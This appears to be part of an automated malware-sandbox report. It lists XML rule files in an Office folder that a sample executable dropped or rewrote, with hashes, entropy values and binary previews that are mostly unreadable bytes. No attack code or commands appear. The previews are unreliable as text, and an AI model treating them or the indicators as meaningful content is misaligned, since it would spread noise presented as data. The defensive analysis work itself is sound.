                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701051v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1732
                                                                                                                                      Entropy (8bit):7.897194244189294
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ErZTEGLrDV6LIKa4sr38D1Z59K/QzUXH0MD:8u6rJ9r3cH9sQc
                                                                                                                                      MD5:CC3FBE7C322B913E03F9E4F161B6DA19
                                                                                                                                      SHA1:66E40E4CE2BCD8750ABF5D4D9F078F28B7790BEC
                                                                                                                                      SHA-256:BF5C9F26D2D598052372177830A138A204381DDA255A7253A129CA7AF3DD1EAE
                                                                                                                                      SHA-512:D0C4A71BBE3BB5CE31B3B2CA503AAE2EA9B567B86095BCFC298F9E08A7B30CA922841DD07B280B53EDDFE2898F035542C643B526E8A703164464673AA90B9B59
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...Dx..#.....|...1..CV..6.x....^I.9..Y......R.j.s.wG31.%.l.E|.VUv.Dx...=p&.J..U..:BF)Q.L./..BrDR...p.5!....."`. .G].:,..A.N.-.......X.IUv...S.....#.&..z..y1.....Kdy.(..p..%..a..`....}..4.v.s...W.#..E..,.muM..3.@........fqgT2..2M.-...l...C..(..W#@T[..91V^.5=.k..a$....D..".L..x....*.C+....,..axC.s.d)R.G/...m....'.......3..!...5...s..E.M.$.. .._.E.F...6.. ........!..5.1^.......A.)..D...*....;...<..L..v..!N....B./..n.-.d...C....zK\J..qN..T|4!...j?x.X......................m...........G.G.-....>..E......Q........g.C...b...}Y.Dx_p..]g..e......2.3.Pn.2...u{...R.% 0.......g..l..F`....... 0A.8..*Oo.....s7../G.&e..+........m0..S.".Y..P.U..aU%.....~...we..u..6...n[..X.A...e....@...WJ..2-.I...p..f....=...-<|.!..Ft........?xq.l..`.D>..5..$....YY!.{..:..:....$%5`...A?w.=..n...e......./........."t5.L:.S..l.>...Qv...M......L..y.i..M..l....m=$.....P...7.1]c...}...! w.(.b..9.Ly..T'.x.HTW..y..|.Y.4....a....OpP..b..7u..`A.|...u....*'c..".......X...u.bS.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701100v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1707
                                                                                                                                      Entropy (8bit):7.863417721528259
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:QOq8cLU/WJxUy8eaCy11y4XlXG7PioQ6vldOx85Dy+Iudjr68zomT31KyxxuZPPX:QOLcY/WJxU1eIl+lQwDy+zCKozyuLD
                                                                                                                                      MD5:DA7DB2F944284C3ED0A9CFFECE44A705
                                                                                                                                      SHA1:7C2FF95F82C85B3AF2D8A3D451A4499EB2310698
                                                                                                                                      SHA-256:FC3AC60768373CB4A8D2FB8A61AE53DE572922013DF866DE188DE7FC6D29E752
                                                                                                                                      SHA-512:7BB5DF707A0E416163054214D2598D1597F34C1D21491D460168979701B28ABE05BC13BA53DE93A18E89D931F5287EF310606467F9FCDC50DC3BEF130C4F4DA6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlm.<V.....a...u...~..N+..0\..{D.E.z].QC.L...C.P..?/P..9.N..w..jp...rU'~..m.H.L~yda..G.T.4....(.B..F.5.....U...]..z= .`.... ......xi.DV..#K.G*8s......2....D8s^.a#>.....O..Am.5a..bj(.g...n.Las.t;.&..OG_.. ."....0kCjj..%...Xx.3...J0...;.....ONz.....v.a..8`.9]......`....e\SK-.4o..r...C...@V....0.q......_...R.T.%&...^..r.y...T._}...U:.P5.....R.p.GC.../?..Q.o.@...t.h.u.. ....]..EX2..p....l.......>MN.......}.......YO.(h...%.8....9@.'..b;....e./.O.. ..p>..lGF.rd..`;..R...:C..Vl..t.Xv8...."D...ZnE.{.......r..\!...s.M.{....S..U.3.e....._....<5..<4......q.|.}..a..?..T.. .q...x0S..3.t....M*N......$....f..P45P...~..|=....S~.a.A.o..<...]f.=.(AN#m..K~.&...I..<X....{...9..B]+K5.U..%!s....ODB....,va..R.~.)...=.v.K...H.-...d$........_.....U.J]...X/...N..ikF.8}.....Y.#G..h..R>.......y5=gq.-....w. p.......9B...j....j..y.&..#A.Ba}..j.../}.aDuU9 .....[.z>o.yMx....n....f.2s.He..>..|...DM!.....Y..gQmG.xvP.1.hK..1)b..7..*.zL..4.6...t.F.`.r.......^...m.6.h"g..}.].X.....

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701101v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1744
                                                                                                                                      Entropy (8bit):7.87656964534926
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:uJd1IFJW3buvkqR3C23BuHoGEEQ39GKC2FzuysyAiOlE9nFi3NPD:yfI7lv3R3C2xuHoGEEQNRQysyAB+Fi3V
                                                                                                                                      MD5:F04A101D87F3C24D471BB466DD0775C2
                                                                                                                                      SHA1:075C272415205B01168309864C9DE2691BD7D16E
                                                                                                                                      SHA-256:4B62E24FFFE3F4F8410A90A5A23696C067B7865D3D4B98E39EE8E5868E247E5F
                                                                                                                                      SHA-512:7CD12F94371AB1393C71C35AA3039F9E42BFBEEF25F67744627BAC7DB01983EF633DFB639A051DB10CAD3A6EE9241FDB1A2D740253D9A006C9481AF46A5F2EC3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...r..3(....Bm...w=......n].ZU.S.\t.py=....R........M6....l...R..|q/.s.$4.SJ@...N3.;.4$...:K.Rz.k...!#..^...'@..$....q.G..w).N.O...lF&....dH..uE......2/......0je..r..^....:Ym..6N.gq*J@ ..J.%..cj..J......Bob..\..e...f.,.Q..v3q.1....N.h.....D.`.'J....]~9...m.'.h2.....p......k.<t..>9..l...g..CO^\...b.$6...r...........#.~.....x..._.*U...RQ.&..BK.\f.....~...u......).(.c....va.'.d.``..?5.b...5.......$....2.M.@.r.....*.yN'.jA.....Ey....g.,.<..t{.t.3....H.....<..`...........~.W-5...m.U...F.q...Nuv...K....k......d....k>..{..*zr9.....d...7|g-..Z.........X...f.rT..".{{!...t....9.`...... .n..f:.l.L.S\.6.,Lo5!+.Z.1..S...W:E.i..]._S....o..D........C...'.(Y.<...%.!.m3..~..W./^W=bUo....4m..[!....f4s'.p..od.6..5my......k...RY...G.}.YH..E.6..r..d.(.....ND...B.h.o.......xb...0(BFI....+.*V(.f....L.Z/.:....|..."..;...I.5TX.._fQDD.l......A..r.H.x....x-..8.K.7.........8..........8..c.....2........`G...s......1R.[u..Q.HR.#.].3b.g?..XY.g....O.3.Dnh.T..W....V.<.o

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701150v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1697
                                                                                                                                      Entropy (8bit):7.882797089147272
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:h2Z8VoF6gBnIjzQrAr64TMHzadFyfBB074sgfJbKRh+cqke4Iendvm3sCbD:wZ8VoF6grytqzaPyZJJbAnvM6zQD
                                                                                                                                      MD5:42C7CD6D03C226C872DE07C5641C6D4F
                                                                                                                                      SHA1:471CE8288B0182364A254DF4156D38988749E162
                                                                                                                                      SHA-256:F905FEBB61E65CC4E143114E8D8F7FEEE6F9EBE4FBE8A9ABD9334DA51D5EC10D
                                                                                                                                      SHA-512:1A6768F15B0DC133F3FAE5B30B9814263FB730BEC41115DBFB9F16DBC73F20C508FC49CB4BB89131850A484B6C88CA8DC3A2B2E64F14C060DF335AA5359A6872
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.r`....jI>.b.5...se..8#4IA..O.B.c.......6.7.c.1k>V=..S...Z..w^Z.ZvU*.U]5..d.:...~...q........I..p\...u=.R/V.\.k..7 .! pQz..W[..8....<............s.{..I.8...2.`..[n.........#T...2zi#./m.~.g.m..E..H\..6.c.5f.G..\.E~.....qQ...r._.tf..r......Px/.R.w...J.+.........G....V.$EN....Ed....E..W.].u..4a..N1jz..`..+j.....c.........L.>UhZ$0~.pY+c..........M......n..\..u....[.ne.,ub/..."p<............2..G.....v...%.U...+....\W.i.........".nU.K..2...f..H...#Y.!1...pk.#..<l.p..../..)x6.J..g.{.a.[.$.W....~.o.d.$...qy..rW.o...p.2.u[9.y.0.cyM+.."A...H;....V..A.{.WmB.VW.Q><M.(..+$.....NL.....o.x...9/..]..<%9.F.....e.c{e..s?_z..JuE.Q..5Va....A.d...i.......)BN..L.|.....p..L.{q.o...........G4=(..U3...Q...e.P.."....<.....'.@.*...[.........Wa.\...L..H".f..l..u.&.........G..$.r...........e.|....#..(.m.t..t..j...:D..B.J......9!..a.;!i.m...2T..HS....#.U..l3.^k.L....i_.H...W..h...kq.w%.y...(..<......<]2..<.P)......u.5..p..m.S....l.o.k..tu..0...q|..jOEq<...

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701151v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1734
                                                                                                                                      Entropy (8bit):7.893893511216373
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:QSsSz1qekj1SbTuzoQDxqADnl/CjFfDN5wp1nbhKcD:Qs1qnjku8IEjpN501bhH
                                                                                                                                      MD5:E7E5BE1088EDC11E4FA7E9A54628DB19
                                                                                                                                      SHA1:A83E8A8DE002D83135AF23A5A85549E79750EDA6
                                                                                                                                      SHA-256:CFF928445A45792216C83A39736EFB0CAC4D9CB6C147D9A3E15EADF8300A3873
                                                                                                                                      SHA-512:BAE01EC3D8BF980B78AFFCAC767CC1F264BFEE9852FD9988AD8954750DF6AF5866AB0DF17A686F011DD12FD073DCAF4E3FD2CDAAD96BCAE31EE512F432C01C82
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..../Y.w..)C.Y.W..,.b...CZ...Q.k...TH...............9Q.z.o>*.y.-."Y...l......s..SU..f. ...d.=.=..Bc.p..L...B.......:./7.-..c..^...I.F..?g...;..f...h.O..R..38.1...l...=+.h.6Q.;..(}.....*(f.........#3v...8.v......[.K...}.....#.E3._.....uc.......jH.^.W{..Q!....5.D.\.3...1O....\.H......6*\.BT.a#..[.7./m..1.0l....qW...,.8z#7!.3..d.)w.....|.q..&zj...,P..w...$....V.........\.....z,.V+...m1.0.0<..0.^..IR...3P.Y.!.L.(O.X..[..p.jJ...T.f3C.2...;.6.%.%I.. ./7..D....I..#...,...(.....8.-,6.Ex..e:....1M._+<..O.Y..M..{...#.JQ.......}@)T.Y.......4`......*.q...jn1."0.r....}....;..huN4.ef.KS./....:..-...|...Vdf.P.cd....4...9..>BH..z.fa_.'....W.R.G...y.r..!L...E....c.e.^..O,.....Vd:.g...K..)Q).9.<V.....=.@WD.v....}.~..2]..).x^.|..!....N..d?......|.@.@.E..+q..Y.m....Q.wI%> .]M.0...X../.........S.k.!1..ad@3:.!.............X...X........eT...-..o.r.>br.*.Y.+..u-......Ay.........L ....)......yk#71=Aw.Q;..K.Z..-.;..]!....'..........)......p5.....@...

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701200v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1689
                                                                                                                                      Entropy (8bit):7.876006202527877
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:aSHKCqG5GvGa+m/XwbPVvCTFrP2WaCCedD:fHL5GvxL/6PdCRrvaCCel
                                                                                                                                      MD5:E4511902F34CA20E61086E7AB2B03CF3
                                                                                                                                      SHA1:F925B4A345D2724222909AED2D918D90701A3AF1
                                                                                                                                      SHA-256:2FD240D9FDDB0701218052E3AE135A73D5F33F1CF3DBD55E027D762B52ABBA6B
                                                                                                                                      SHA-512:38A7466E99FAE897379035008D223D212ECC8EC3A7CD86B3405EF2B5EE037E7D1AFE707D4169F7A0E0720941A2EC746192F1C0576D76DF1FE8BCDB8E070C5CCA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlF..3b....<].....Z.....na.Hc.l.]VF...gD.d,B..C'.....R8...2q.6U....#X..l].F..}.O.5.H0fz.7.fI%....tp...xm.S.K......4LP.j|t.g~....w)T.;...e.N>.5...a.V.jl........W.,$VS....hb.k.]u.:..a..h..3..OL$.I....A.n3...+...&....b...8.Z.h......p.aK.9Y...Iy|H.\.p.I.._?.(..C..N;.=....y2...LX]..r...,..{.4...y*. .i.L......9.^....2bS..T.8J'?..x...{|...m.B9"D.e.u..).....J|?.....L.v...f.....X.J.{j..-.. <.....[5...=y.......x.:.?E.g...8s...>.i.........v...$A4....+.L..x.f}z...E^a?.b.....OSO..@..'}.{.O.1"1(........S]....3.........J...q..X..J43...d...f*c...B.(..~.3..QC........qyfr.$)..[.h.C`1..byB..,...M.%...,.Om.1....p..l....D..w....Xs@......k70.L....9..oK{.V.S..I.a..n..G.Y........n....FO..O..?.n)......E...^..p.VD.........X?.....<x.I.)o....i=... ..;..^.dzF...E..Z....[=qM..R.1JcIsO...c/.Vh.H]J.Po1q...,}..F<..;...<...md..g.\6......P...`.#@_.M.c.T.....Nm.....q.@.,s...Be.-.Xz;..<\.t...+...T6..E.A.....`...h?._d........nc.tD..^%S.T.9.....).[......X9`...q....&

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701201v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1726
                                                                                                                                      Entropy (8bit):7.8890040283419625
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:A8euksTh3tpBNUv+AQloDGTCCUYfxYVqovi2L/bVLHYZKSU7bD:A8X9Y+cDlUiJK2L5v/D
                                                                                                                                      MD5:7A669ADD34E5C1EA180CE545FE8B2C9F
                                                                                                                                      SHA1:D084D575E59E8EFE896F3FAF36592E593DCFD3CA
                                                                                                                                      SHA-256:6682D4469A3A87E358BA79A04515E13DAEA59D9DD6D9389CECD978FD660A2D4F
                                                                                                                                      SHA-512:CD6A887DC5D6ECB6231D19DAD105C4CCD80265FD9E72D1AA814179823676FFB159086DEF3FABAF1771042021F9C04EEF7F084EF51BBEAC4960D8C568596C6CF1
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml=...Q......z...~..*?}..A.i....m..9.>X..y.&..CCn..Kt......x.r..l..^......'s..#].u7b.Q.K.3....i.!5.'..;...............]J.K..b.Z...0.....Y.J.M..'..~...d......k(3@j..c9.|...n..f.1..?"l*g..f....?....}......>!.6LM...........Y.2s.U@.H.....2A3...........h3e.....P..4.qo7dq.(.x.#qpyb..X2'.6....}...d.`..)h.56...rp....;..0.!.r)....7:.../.Dc..._......F.&....|...)..L)&..x4...*..0x<...^<..i..@wb.F.A~?!Wd..$.<.sr7.2.C../u.....k.x.M.%..E.Y*..(...f.4.....t.>>.u.^H[o....|.-.v....r.}A..........H'.sU..tH.G.B2Wfe..rYyt....0.PVh...I...M.I9..E..._...\......<}t#Q..........a.>..e..z.l..vs.2;T..%..LL.........S.r.(l.Y.TH.c..:.u}eL.'.&....'G<..6...ni..v.k.(-o..v.2..<...KtTy..M-..J~.Sk.Vw3..6m...kw.U...K..3.5y..s..76.UPr?k|.v.h........u...../.........l7.tV.....b.g.s..E.?._e.SL.h.:..*.zn.d#...A.+N....#(T.@.m..{|-.........!......Rdd.....J.p h7.......=...d.y...O6.p...O.f.f...8....j.By.'.e.y#.NH...T..hF.T.2op;...J..3U..b...._..6.....-...v5oV.d...<.@.S.(c.:D...9Y#.K.......JG.v.o}

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701250v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1691
                                                                                                                                      Entropy (8bit):7.8932586025848925
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:1L6yniHleWvQkYnc5rO/hM7Y6ja517nPT1rbaZ43oeORXSdz3gKAL5tZZDoKbD:p6iWcklE6jerbLORXSGKAL1SoD
                                                                                                                                      MD5:0DFA01C37A55630DE93F714969FF7FF5
                                                                                                                                      SHA1:BD354C5B28AC2A8086C0F081DADC4A2BAD8BECDA
                                                                                                                                      SHA-256:16428F3D10E5CFD494A1BF32844166C01BAF1E958AE4B95BEB499EFE8296A396
                                                                                                                                      SHA-512:91C7DAC349F399DB11DFD67EF804BE5FB1294FCCFFF7B761DF79605A6A704D5D714946C51DBB763805BFBB7E827455ECF628261A06DF7CD7F6381A884FAE5CB8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmliR...BJ..@.&....l]..BL.9..../.fI%4..p.z8.<...u.FE.k..o0."+N..P.s..]f.....V&.)....d|.yj...=sU>....|l...2..P&.V...B.(......*S:....b..:.#...R.+.H.|x.X.{.g.B@..9Jd......<5:.. ..9...Y..P..=*..S.....P.!...L..Fi.."..DT.-E...d./R.L...*.].u{.n.|.a".[N!C....-=.pU(.}u....R>...$g.i.@..<B._.].H.]W}...YQ.2.[.(.Q.....)......}.......&S..+\.ct....}d/LkP?...s.k..O.<cz..k..Y...x....U..|L....^Gm)W.Qxn......]e...m..o.F.......Q.....D.r.c...5..T.A..a.M.2.K.+..ta.n.x&k.o...I.uV.P..v?f/...f.1...K)..pB. ..G.N.d.../.!.+>}.{.l.B.....Z1...F.%.}..$.'..6...;......l..`S.."...:...Z..v.yxn. ..h{..0.{...%F..5...s...."}.r.lj.4.....p...&WFJX.zb..<.G.>.>n..L...=t.1..@.P.r..=.+..c.e$r..a...0{h..n...~#.......1...........q.@..y..a.......A....H.........%O.z.kL;.6.Y,<....C.D.9ZeN...r/\.{Z......@.8.B.r(....Y*...gS.u.V.'g.3.t.x1..xjk8...].G9m.N'$.9/!.lv.../(.X..Dc:a....?Ra@..U\....qm{q..mG.FcJR.....F..?..1.. ....ln..T.T_....{e.X...\..q.....J..rLc...8.3...$.v..R..t.^.C.UiC/..K.S..^.D.....g..<.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701251v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1728
                                                                                                                                      Entropy (8bit):7.870042865609015
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:+13314fmC5J4C0VANrUztAjS2J+IbEuGExbodX57bxLzRbLestoDZFqg6BcOhlTO:+895eErJ/bEuGQoJzRestAzqJNhlSD
                                                                                                                                      MD5:90B1FC81D998130AD94E633183E3B52B
                                                                                                                                      SHA1:DED0D5A56C6D83A0ABB3246BE75790EB487A0C48
                                                                                                                                      SHA-256:0DC76DC7B7EF9734F08B0A7E48B07AE2ECEFB974D46A31B7BE061EE1E03712CD
                                                                                                                                      SHA-512:1ABA1FC30B4E2D162347D9927D06CCE6B31454BBEA8254B5386D511165ADE79EE1EAF52D386FC299283E0C45CDDE258C0275D389E0361CAF362222EA98E16307
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.Pl....2....F..".%y.....TA..f'`.x.#......f.p.P.({G...V......AB..%5...........-..Ue......[...O3/M.C....0>ksLu..Z*X..4.6..N....YQ..Q.\..K..7....M.2.a2$.,.JA..`.....p..)..SU.(~.........#..Y.z%......T<=.....X.b.y.-<E..+.<..+l..5.]..S.{..Qc3..z.0.%x..o).%.K.R.\.#.y.{...{.[~$0Ti.'@'.#.m....v......8.lX.~%....fZ....R.>....b..J...........[...|J......G#q....O{&....T.j.n$AJ..j.'..nd..=d6u9+...U..!..z....]..'G..g..S??J.l....$..).U._.......4 ...a.w.z..4.....%.=.......$.t.z...._..q.$....U..GP...X$.9..D........|NXc..v...z........i...%B4...+}...sS...F..4...?A.+...C.n8#.[..&..4.o..J.......hR...r..#.........pX?........3....J?0...G...kL_.E.7S..@...G..s......[.........S9...n ...Z&.....rHJ...........f..HH|\.%=.2......n..\>n_...^W.f.K.Dv.h.`.....a]..... z..y_%*5..B.D..v.)-...M."{..-../.....A....1.3.X-@.....S.`.u5-.s{).n...8.?z.p...........P.x.?.!..j.2J.Ep.9.......`..n.U.N...y...LDT...K.....}..%.w..D%...........F.....L<.!<...:).....T....Wo..L......a.8...i

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701300v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1699
                                                                                                                                      Entropy (8bit):7.888841259964088
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:MTz9sWU/9nOuLzCPr4Djd82DHW7WvxrtYgeFO55dMEp4pD:MTzi9nBL+Prl8rLeWdMU4B
                                                                                                                                      MD5:58B235D5E287F2B3844F2AB0FA100EFF
                                                                                                                                      SHA1:BDA1DFE33192F42A60234A39BB27A985C76DA8B7
                                                                                                                                      SHA-256:3F7EF553859168353C607147E8520B3C750A8CFCD9EC0996397A8FAE98E09623
                                                                                                                                      SHA-512:B7D05F18AC743AF5C450FBACFBA79BBD895862867854AFC91A539CA05ADE6CC82CC84758B3D93185E838ED978D131943D85AAEF512208EF984743E42353A3003
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.}.......h.S.V...R"..f,...\.....'..CU.%.....9.6N...y.W.......2-7x..Y@`HoU......p,.F@I..f....j........g5......i^...........dE.b...\.\ ....&jt4...*E....=.z.s,~.....n.C {...pT...SXU....L..4.1fc.Q.e)0;...Iz..tokX.6%........x.E7{...8!....^.j...&..... j.@!@8c.Y..&.4..;y..y.GL./.]F...!..t..M ..L.\...\s.Tn5.....}.......0.y0Mo...]...k..E1..k.W......}...&.......g...7@.@..d%.._.a.D.H|.^.(..n.q.i..<.9}......B.%6. .G.d-B.Hl+...3".o2...t......o.S.N....@...3....$.^0.......[.xl%.....r.!.rw...f....R...]..p!..5....6t).i\..>N..K>g....k......v:B..VpNU.$..0....3.ZT^...m."...z....8...eY..b...Ql.,o.[a.Ah.1wJ.y....F...J2.;6VG3..`....".]\1.a...iw?[.x..].....Y...-..*'.Z.13Z/.&.W.7.#..#A.?.4..+...%.].w..A.H.".].._..a.U..+D.SI@v...l..p(..q.G)PPRX..tV..._1>L.y.......u.+.iD..)..]"E.....+.....<..-N.........[.&+......0...&@.r-..v.G....cP...~.....s....b....M....+............H.-..h#..RUs....-.~VA.2.B.=nS:..m..aT....6}.....P.`..t..g...j....=.<.0...[353..5.X{...f...;.....

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701301v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1736
                                                                                                                                      Entropy (8bit):7.877488486481027
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:Z96I3b5m/MWuIV6pkHuoB4cw7zQmm8RXOCtQD:Z1bfI3f8RBM
                                                                                                                                      MD5:BD35D178CD1E839D2300D1D96A65DA3C
                                                                                                                                      SHA1:88EB978D502D9E8801CB1B5AAB1DB2FD2C2C16BD
                                                                                                                                      SHA-256:AA6BCA98767B09BE9835C0D63DC0D510F2083D2AE7AD424E72AE4CA32986C81D
                                                                                                                                      SHA-512:8C72DD4B6F8D3B2C47544151E0B615CFA55532D0B58CA0C56484D8C850F5C56A821FAC0D0B04E15C6435440B271DF71D422A71BFC27642F4E9BE65A0FE8CA750
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.!.o...f.S..*?.^....s.+.!.)^/.v2TS."..b...f.U9.2.,.i..?..:w..&.G..K.a.r[..IK.....|M0KA...#}SN}..`.A...~a..?.a9.......d.......3:N..z.GD.{*.;.......V......J4E.P.....w....X2.T.\3.P...h..`.C.X.w...h.)....l.O@t.z..I.a........._z..l(...^...).'i..M....-...b7.Wocq..i..k..s...D.rMQ.I.......!...*.....D..%n..L.h<.5..*..N...Y.{.$....j..jq...oH..T.....3..9T......._..p...|...m.w.#...y.....I)....K.i|-.~......&....\&'.0R..~7...M....^J+.....w5.+....T.k_...5o...MwnG...P...-.5.`..b.......N.HZG.C.5....=...C...."{.!.}.......p.)...5...~`#.....u5.:J.h'..L..Y.)<%.T..U<.._..!.../..b.x`.{91.3%.".+...{..Tl>9e.i..>..6.. ;hK...^..a.d<...l.>.d....I.q.._..7.D.2.X.r..).......R..)..x.Y..jT8.|O.J.d..%.......:...K...o...\>........P......&#.c.6.....P.....V_..T.../....S......B..G..... .D..5Z.\.:h..UO<.......k....X.....4.........5*S7.}..O.}...z...v.3c.\.6p..9...f.........w..~.\.C}z.,.M.9...p]...:..]F..._...<!7j}.Lt...E`B...L4.Ay...Q..>,.........0....wQ;..\...$.V

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701350v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1703
                                                                                                                                      Entropy (8bit):7.886547575693346
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:yXHemhIrfNdOOtsjO7L9iXV2lCc+DVNZXgOrD:ZQI5dOZSiXV2lF4pf
                                                                                                                                      MD5:ACC65CE91E49C08EC241B3D41C8C66A9
                                                                                                                                      SHA1:0ADC1F8681D12F6FF015CE6D89F58DEE16AA183D
                                                                                                                                      SHA-256:D782AED14387ABA928D2D3C390F43A88F30D0E2B3AA11F3FA3D08521E4E794F0
                                                                                                                                      SHA-512:8B2D28E3E894A753B502CA6EC1C4E72909EA2E64A5DEF2DCB032AECEC05FAAC15AB60177B62265D4EB8264276331CCB3DEA6B429CE9F1669A255D6F4318401D0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..;(y...]..n.A&t..}.-.a....K..Z.b.........4.O.|Rw..0..*K...$..`...q[D.d.5...0..{.}..8......../.;K=&....=........._L.bYj....h....~.....EY.;.QC....i0....).....N.......X....aNI....<T&...x.a.s P.x5....[.R...4.N.!...-!.T...H.....{..9a.}.c....t...8ds%).h..wU^...,.B...jt......$.C.i..kb.?....]....V5.z.r.}@\..#.?M.V.....8...crq...2..3Y.mb..>..'.0...bYZ..|..e.C..\`Moc.|>fg.s/...7..........Ok.............h.r...9..Be.......70....mF.......Q...bp .../...Jdj..0........qW...M....cW.. .u..'..^......v...5.._.....u...[J..q.Hy..B^.......Tq.I.~M..Y.....'...P..9...Yq..~..p.."g.=..G..soHh....`9..s.C`J"..Q..%...`f...[D...$.......Zk.T.).noO%......,7.3.PA...:O.=T.].{....P. po..@\.Z....C.?.DX.......0O,.*.Z/PVH6P....5G..k+o.......e1edQ.;.J...FB...'.X.JZy.R...-..Q.............R..8.D9....".i/..y.<....T..d..jI.....`.v...^.X.....6.{.a....Q......9(-:w....F...w..j.Vtq....d...../....r.i.Fw..`...v.:.}....E...:.%C.BVV.tw..b.j.*}.2d..i....K..A...\c.^j..N.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701351v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1740
                                                                                                                                      Entropy (8bit):7.85837580953605
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:eM+WovkA6qSsYJgXmRPPvsHcBOH1GB9FafiD:eM9Q2B3vd8HCSfq
                                                                                                                                      MD5:E05F80935EA07C7D198778229FD1BD0E
                                                                                                                                      SHA1:546F74AA85FAA9AC9E9A9AA7698C830226758D19
                                                                                                                                      SHA-256:6DA02698F71B3C8E40C54739AA9C601E4E89096023A5D31C933F9DA7839F1437
                                                                                                                                      SHA-512:2EE4F38C65C2C83F4AE83F0EE01D9DF8CEFC77AC48509C3353BCD6933306E8195E451BDC7FDFB088651F21FC5B7960C7986A7E181093A124B60A0322A53026BB
                                                                                                                                      Malicious:false
